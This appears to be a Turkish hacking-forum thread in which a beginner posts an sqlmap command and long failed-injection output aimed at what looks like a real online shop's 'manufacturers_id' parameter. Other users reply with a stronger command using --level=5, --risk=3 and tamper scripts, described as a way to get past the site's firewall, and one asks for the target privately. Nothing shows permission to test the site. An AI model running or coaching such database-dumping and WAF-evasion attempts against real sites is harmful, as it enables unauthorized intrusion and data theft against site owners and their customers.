Sızma Testleri SQL Injection ile sızma başarasız oluyor

Kaliyeyenibaşladım · 9 Nis 2022

Çalıştırdım komut : sqlmap.py -u Zalman, זיגזג פתרונות מחשוב --dbs
Coockie kısmına y

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y

UNION Text:Y

Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

you have not declared cookie(s), while server wants to set its own ('osCsid=6hhu603ej88...4cb9pgj7uv'). Do you want to use those [Y/n] y
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

w1sd0m · 9 Nis 2022

Kaliyeyenibaşladım' Alıntı:
Çalıştırdım komut : sqlmap.py -u Zalman, זיגזג פתרונות מחשוב --dbs
Coockie kısmına y

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y

UNION Text:Y

Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

you have not declared cookie(s), while server wants to set its own ('osCsid=6hhu603ej88...4cb9pgj7uv'). Do you want to use those [Y/n] y
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

Merhaba,
"Level / Risk" değerlerini yükseltip tekrar dener misin?

Kaliyeyenibaşladım · 9 Nis 2022

w1sd0m' Alıntı:
Merhaba,
"Level / Risk" değerlerini yükseltip tekrar dener misin?

Tam olarak nasıl yapacağım?

OBT is HeRYerDe · 9 Nis 2022

Merhaba;
"Level - Risk" Değeri Ekleyip Güvenlik Duvarını Aşması İçin 'tamper' scriptini Kullanmayı Deneyin.

KOMUT;
sqlmap -u 'sqlaçıklıhedefsite' --level=5 --risk=3 --tamper="between,randomcase,space2comment" --dbs

Kaliyeyenibaşladım · 9 Nis 2022

OBT is HeRYerDe' Alıntı:
Merhaba;
"Level - Risk" Değeri Ekleyip Güvenlik Duvarını Aşması İçin 'tamper' scriptini Kullanmayı Deneyin.

KOMUT;
sqlmap -u 'sqlaçıklıhedefsite' --level=5 --risk=3 --tamper="between,randomcase,space2comment" --dbs

dENİYorum sonucu paylasacgım.

deltaturk · 9 Nis 2022

Kaliyeyenibaşladım' Alıntı:
dENİYorum sonucu paylasacgım.

Sonuç Nedir

Kaliyeyenibaşladım · 9 Nis 2022

deltaturk' Alıntı:
Sonuç Nedir

Hala devam ediyor.

deltaturk · 9 Nis 2022

Kaliyeyenibaşladım' Alıntı:
Hala devam ediyor.

siteyi özelden atarmısın

deltaturk · 9 Nis 2022

Kaliyeyenibaşladım' Alıntı:
Çalıştırdım komut : sqlmap.py -u Zalman, זיגזג פתרונות מחשוב --dbs
Coockie kısmına y

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y

UNION Text:Y

Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

you have not declared cookie(s), while server wants to set its own ('osCsid=6hhu603ej88...4cb9pgj7uv'). Do you want to use those [Y/n] y
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
